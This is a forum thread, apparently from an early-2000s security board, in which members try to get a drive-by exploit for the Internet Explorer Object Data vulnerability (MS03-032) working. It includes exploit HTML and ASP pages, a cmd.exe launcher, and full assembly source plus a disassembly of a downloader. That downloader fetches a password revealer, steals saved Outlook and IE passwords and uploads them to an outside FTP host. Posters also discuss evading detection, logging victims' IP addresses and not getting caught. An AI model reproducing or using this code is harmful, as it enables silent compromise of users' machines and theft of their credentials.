(previously posted in thread "new Exploit for IE". Moved here to discuss specificly the Internet Explorer Object Data Remote Execution Vulnerability)

Hi everyone,

This is my first post and therefore I would like to use this occasion to thank you all for sharing information and participating at governmentsecurity. I highly respect your effort and knowledge you bring into this forum.

RESEARCH:
I have done some research about the "new IE Exploit" and gathered the following information:

This Vulnarability is called "Internet Explorer Object Data Remote Execution Vulnerability" and is one out of three Exploits described in MS Security Bulletin MS03-032

The full Disclosure of this exploit (written by eEye) can be read at:
http://lists.netsys.com/pipermail/full-dis...ust/008705.html.

Two different Demonstrations of this exploit can be found at:

http://www.secunia.com/MS03-032/ and http://www.finjan.com/mcrc/demos/objectdata/

CONCLUSIONS:
Based on the information gathered, I make the following conclusions:

In short, IE permits the Execution of arbitrary code because it checks the extension of the file stated in the object data tag in the requesting html page. If the extension is .html, IE does not check any further. The server then returns a unsafe file (with an html extension though). The client then executes the file based upon the information in the Content Type Header for the unsafe file returned, so if it for e.g. says application/hta, it executes the file.

The default configuration for IE is to not execute unsafe Active-X in the Internet Zone, and to ask if it should execute unsafe Active-X in the local Zone. The reason this Exploit is needed in the first place, is to execute arbitrary code on a computer in the Internet zone and doing it without the Victim having notice of it.

The part that is tricky, is how to set up a Webserver, place the exploit within, and do what the two Demonstrations linked above do, execute arbitrary code (with the potential to run without the victim noticing it).

Doing this would be the key to successfull exploiting whoever you want to exploit.

TESTING:
However, when i run apache or xserver, and try to exploit myself ;-) the code does not get executed when i connect trough the internet zone (for e.g. http://**.***.***.**/exploitRequestingPageWithObjectDataTag.html), and an error tells me there is a script error on the page, asking me if i want to proceed with the script or to cancel, it doesnt matter what is chosen, the script doesnt execute.

When i connect through the local Zone, (for e.g. .http://localhost/exploitRequestingPageWithObjectDataTag.html) i get asked,
if i want to execute the potentially malicious acive-x, if i choose "yes", it gets executed.

Note: All tests have been done with the default IE Settings for Activ-X. All tests have been done with various scripts, (including basic ones as just running cmD.exe).

Does the answer to this problem lie in the configuration for apache?.

PROCEEDING:
I am working hard on proceeding. The demonstrations proove executing arbitrary code can be done. I will keep you informed about further progress and would be thankfull if you do the same.

secTraq

UPDATE:

illwill has created another proof of this vulnarability.
CAUTION: The link below will execute the acions listed below WITHOUT you being able to stop/notice it unless you have Antivirus Autoprotection running. I quote illwill as he has written in his post in Topic "new Exploit for IE" (page 5):

--------------------------------------------------------------------------------------------

http://doomdead.com/users/illwill

downloads and executes an executable from the website, which in this case is a webdowlnoader i (illwill) made, that in turns downloads a i.e./outlook saved password revealer that uploads to my (illwills) ftp

have fun

(illwill)

---------------------------------------------------------------------------------------------

Here is the code that is executed. Its not all that hazardous. And its amazing i was able to get the source

Thanks for the code wOOdy. (Unfortunatly) this is only one piece of the puzzle.

This code uses the extension .asp . When the page containing the code you uploaded is requested by the client, the server returns the value "application/hta" (html application) in the content type header. The request is triggerd by an object data tag referring to a link with the extension .asp by the client through a website or html crafted email.

This is one part making the exploit to work.

The second part nobody i know of (exept eEye Software, Finjan Security and a user of this forum named illwill, who unfortunately hasn't shared his knowledge up to this point (of course he has the right not to share it, maybe he is just to busy to share, we do not know, and no matter what i respect his work) knows what task additionally has to be done to successfully make use of this exploit.

Anyway in order for the exploit posted by illwill to work, the webpage requesting the code you uploaded, looks like this:

<html>
<object style="display:none" data="cmd.asp">
</object>
<h1> hi i'm illwill</h1>
</html>


But like i said, this allone will probably not make this new great exploit work. Maybe the webserver providing the content must be configured in a specific way.
Plz let me know if you have any idea how this could work.

Just some thoughts:

This vulnarability, once every aspect of it is known, will be very easy to take advantage of - only in legal ways of course. As the patch for this has been released just a week ago, one weak after the dcom worm has starting to attack, it is very likely that almost every windows box, not everyone ofcourse, is vulnerable at this moment, but i assume that patches now, after the dcom worm, will be more likely applied sooner than in the past. Also, i believe that because there are less technical skills required to use this exploit and also marketers for dialers etc. could potentially use it and (i don't think anybody has mentionned it before, but i think it is possible) email worms using this exploit could spread, this will be patched as soon as it gets in the wild! So m8tz we are working against the clock - would be happy to see you partizipate. There is still a good timeframe we have here.

Cheers and goodnight for now!

Hi all,

The script downloads http://./DCOM2.EXE to your C:\ (it is renamed as C:\TEST.EXE)

Test.exe is a webdowloader that executes http://./PSPV.EXE (cf : http://riedersoft.myftp.org:85/~users/nirs...tils/pspv.html)

The command line is : pspv.exe /shtml snagged.html (it produces a file "snagged.html") with your Outlook password. Then, the html file is sent to a ftp server, and deleted from your hard drive.

Here a sample of the test.exe disassembled..

See Ya

[CODE]
;------------------------------------------------------------------------------
; Name: .data
; Virtual Address: 00403000h Virtual Size: 0000035Ch
; Pointer To RawData: 00000800h Size Of RawData: 00000200h
;
SSZ00403000_pspv_exe__shtml_snagged_html:
db 'pspv.exe /shtml snagged.html',0
SSZ0040301D_illmob_ath_cx:
db 'illmob.ath.cx',0
SSZ0040302B_ftp__n__s__s__s:
db 'ftp -n -s:%s %s',0
SSZ0040303B_snagged_html:
db 'snagged.html',0
SSZ00403048_upload_ftp:
db 'upload.ftp',0
SSZ00403053_pspv_exe:
db 'pspv.exe',0
SSZ0040305C_home:
db 'home',0
SSZ00403061_pass:
db 'pass',0
SSZ00403066_user__s__s__mkdir__s__cd__s__put:
db 'user %s %s',0Dh,0Ah,'mkdir %s',0Dh,0Ah,'cd %s',0Dh,0Ah,'put %s',0Dh,0Ah,'bye',0
SSZ0040308F_http___www_illmob_org_pspv_exe:
db 'http://www.illmob.org/pspv.exe',0
db 00h;
db 00h;


....

;------------------------------------------------------------------------------

think i'm gonna follow this thread too

<%
Response.buffer = TRUE


Response.Clear()
Response.ContentType = "application/octet-stream"
Response.Flush()
Response.WriteFile("c:\test.exe")

Response.End
%>

name it download.asp

also here the code for my webdownloader....have fun
~ illwill
www.illmob.org

.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
include \masm32\include\urlmon.inc

;| Libraries:
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\urlmon.lib




.data
Redir db "pspv.exe /shtml snagged.html",0
FTPsite db 'illmob.ath.cx',0
FTPstring db 'ftp -n -s:%s %s',0
Passes db 'snagged.html',0
cmds db "upload.ftp",0
passrape db "pspv.exe",0
user db "home", 0
pass db "pass", 0
fmt db "user %s %s",0Dh, 0Ah
db "mkdir %s",0Dh, 0Ah
db "cd %s",0Dh, 0Ah
db "put %s",0Dh, 0Ah
db "bye",0
web db 'http://www.illmob.org/pspv.exe',0,32 dup(0)
.data?
UserName db 256 dup(?)
UserNameLen dd ?
usernamebuff db 256 dup(?)
sitebuff db 128 dup(?)
hFile dd ?
fwritten dd ?
.code
start:
push 0
push 0
push offset passrape
push offset web
push 0
call URLDownloadToFileA
invoke WinExec,addr Redir, SW_HIDE
invoke Sleep,1000 ; let the passwords fill up
mov UserNameLen, SIZEOF UserName
invoke GetUserName, addr UserName, addr UserNameLen
invoke wsprintf,addr usernamebuff,addr fmt,addr user,addr pass,addr UserName,addr UserName,addr Passes
invoke wsprintf,addr sitebuff,addr FTPstring,addr cmds,addr FTPsite
;create a upload.ftp file that has the ftp cmds in it in it
invoke CreateFile,ADDR cmds,GENERIC_WRITE,FILE_SHARE_READ,
0,OPEN_ALWAYS,FILE_ATTRIBUTE_HIDDEN,0
mov hFile,eax
invoke lstrlen,ADDR usernamebuff
invoke WriteFile,hFile,ADDR usernamebuff,eax,ADDR fwritten,0
invoke CloseHandle,hFile
invoke WinExec, addr sitebuff, SW_HIDE
invoke Sleep,8000 ;let that shit finish or the delete will (filtered) it up
invoke DeleteFile, addr cmds
invoke DeleteFile, addr Passes
invoke DeleteFile, addr passrape
invoke ExitProcess, eax
end start

alright, yall tell me if this works....

http://www.clikear.com/webs4/n0vun/

It loads malware dummy file. (so i hope) ;-)

It works!

how did you do it?

Thanks illwill for sharing that great wonderfull knowledge with us!

nOvun, when i allow your script to run, the script still has an error.

Hasn't worked for me yet aswell.

NOTE FOR APACHE USERS:

If you would like to follow illwill's .asp solution, you can do that with Apache aswell:

http://wwws.sun.com/software/chilisoft/index.html

Cheers

Let me get this picture clear.

You guys are trying to take advanatage of this Ie object data remote execution vulnerability in a way that when a IE user comes at a give HTML file the HTML file, or IE actually, will execute a give command, in the case described here, downloads a file (more of a trojan really) and upload your outlook express password file to a FTP.

What you guys are trying to do is do the same but for your personal use, for an example, do the same to your own FTP.

Tho, you guys or shall i say we, do not have enough information to get this to work? Or am i totally wrong now.

And a nother thing is, we have bypassed the 'notice' thingy already? Or is that also a problem.

Second thing is AV (AntiVirus). Is that being bypassed also?

Thnx,
woutiir

A Guide to HTML Applications (HTAs) http://msdn.microsoft.com/library/default....htaoverview.asp

@mojo: I just used what illwill posted right before my post

@secTraq: what kind of error?

lets try again, tell me if it works!

http://www.clikear.com/webs4/n0vun

Here you go nOvun..

Well, i don't live in an english speaking country, so i have to translate the error, i'll do my best..

-------------------------
Title: Internet Explorer
! Script Error on page
Row: 79
Column:1
Error: Object needed 'WScript'
Code: 0
URL: http://www.clkear.com/webs4/nOvun/download.asp

Should this page be executed further?
YES / NO
-------------------------

Despite the error, you have done more progress than I have untill now. Could you post the exact source of all the files you have placed on your server for this exploit? It would help.

=> n0vun

Now you did it! I was shocked when i saw my screen burn, nothing bad happend though, i hope!

Please share the source code.

I don't understand how you get iwill's download.asp to point to a file you want to download to the victim. If you could explain that much, I would be greatful.

I have problem to write the code of the download page, cause i am not familiar with ASP and VBScript

I supose this is the code?

Is it? It don't work for me. I would like to see the full code of the .asp page , including the code that gets interpreted by the webserver and we do not see when looking at the source of the webpage.

I have a code that downloads and executes a program with a fully patched version of IE and Norton does not detect it. These are the condtions that I will share the code under. . . .

1. I want to utilize this, but not get caught. Is there anyway that I can log the IP address of the victim, without giving them my IP address (such as connecting to IRC or some type of middle man)

2. This code is not for a wide and varied distribution. Be careful with it. It stays in the forum, don't share, or we will both go down. . . .

That's it. The people in here are smart, and when motivated, can do anything they want. If you need motivation, reread.

I found out what I was doing wrong, basically take cmd.asp posted by iwill and play with the vbscript.

Right now, I just made this...

<script LANGUAGE="VBScript">
Dim strName
strName = "Victim"

Msgbox "Hello " + strName, vbExclamation + _
vbOKOnly, "Test Message Box"
</SCRIPT>

and it worked...so the VBS is the key...

what =>

I dont know if it would work, but i suppose you could open an account at a free webserver, doing so with connecting anonymously through a anonymous proxy server. Then make the client upload his ip to that server through ftp.

As I wrote earlier, I am not interested in using this code widely. I only use this code for education.

Would be very thankfull if you share it.

ok, I would like something a little bit better, but I believe I can trust you to find a more "for sure" method. I was wondering if I could connect to an IRC channel and post the IP (which I made a prog in VB to do) but if mswinsck.ocx is not installed, them i am SOL. here is the exploit that will show you the proof of concept. I believe the name of the program is appropriate. All the program does is output "Commands can be executed!" to the user, then closes. The name of the prog is "poc.exe". Check out the source for yourself.

=> mojo

The code you posted dosn't execute for me. Even when using it locally, i get: permission denied. Sure you have the default IE settings?

I am playing around with the code of download.asp posted by illwill and the code previously posted by woody. I believe in merging them, so the content type returned by the server is application/hta or application/octet-stream. Hope this will make it work.

=> what

Was thinking would it be possible for you to download mswinsck.ocx to the target machine, when making use of the exploit, to make sure it is installed so your prog would work?

Bye the way, the link you posted is dead.

=> mojo

I used the code u posted a minute ago. To call it, i used the following:

<html>
<object style="display:none" data="cmd.asp">
</object>
</html>

I get the same error as before.

sorry about that last code. Try going here now. It will open up cmd.exe if it is in the C:\WINNT\system32\ folder. If cmd.exe is not, save the code locally and change it to the directory it is in. Have fun.

P.S. I restored the defaults. Slap me around later.

=> what

Guess it wasn't your fault.

http://www.angelfire.com/oz/z5/ just dosnt work for me. Even www.angelfire.com dosnt work. Could you place it somewhere else?

Just like i did now.

<html>
<body>
<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/cmd.exe"></object>';
</script>
</body>
</html>

angelfire sucks. It filtered out the code. Try it locally and it works fine.

=> what

sorry, pal. The code u posted works just fine - locally. But it a different story when in the internet.

I tested on angelfire, could connect throug a proxy. The code didn't execute.
Then i took the code from your post. Ran it locally, worked fine. Ran it on my webserver.. and again, the code didn't execute.

Sorry, the previous posted code didn't work.

I will try to write it different and post it if its usefull.

I appologise.

i have a question:
I found a site that has the following code in it:

<OBJECT id=obj codeBase=http://cdn.climaxbucks.com/internet-optimizer/br/wsi9/optimize.exe
height=0 width=0 classid=CLSID:FC87A650-207D-4392-A6A1-82ADBC56FA64><PARAM NAME="DownloadURL2" VALUE="http://cdn.climaxbucks.com/internet-optimizer/br/wsi9/optimize.exe"><PARAM NAME="Delay2" VALUE="0"></OBJECT>

It downloads and executes a program called optimize.exe and creates a folder called dialers in the Programs folder. But, when I direct towards another program, it does none of the above! Any thoughts on this? I find it really weird.

I honestly have no idea.

Besides, i kindly ask you to ask your questions about other Topics than the IE Object Data Remote Execution Vulnarability in an other, to your request corresponding Thread.

Don't get me wrong, i don't want to offend you, but i opened this Thread to specificly discuss the Object Data Vulnarability. People don't like when everything gets mixed up.

If you do not find a Topic that matches your request you can open a Topic yourself if you wish. Like that, questions usualy are answered if people know the answers.

But, IF you have a question about the IE Object Data Remote Execution Vulnarability, i will be happy to answer it if I can. And of course i will be happy to answer any of your questions, if i can and you ask them where that Topic is discussed.

No offense taken. I'm sorry that I was getting this all mixed up. I'll be posting a new thread that discusses this vulnerability elsewhere. Again, sorry for the confusion.

why doesn`t that work?!
http://www.mydox.de/repox/index.html
please help

i got it working - just change the mime settings in IIS-setup.

i.e. if you have a script "download.asp" change the asp-type to hta...

guggi

Tried changing mime settings but still the exploit fails. even changed the httpd-conf file settings of my server ......the exploit still fails ......if anyone has any idea plz explain how to configure the server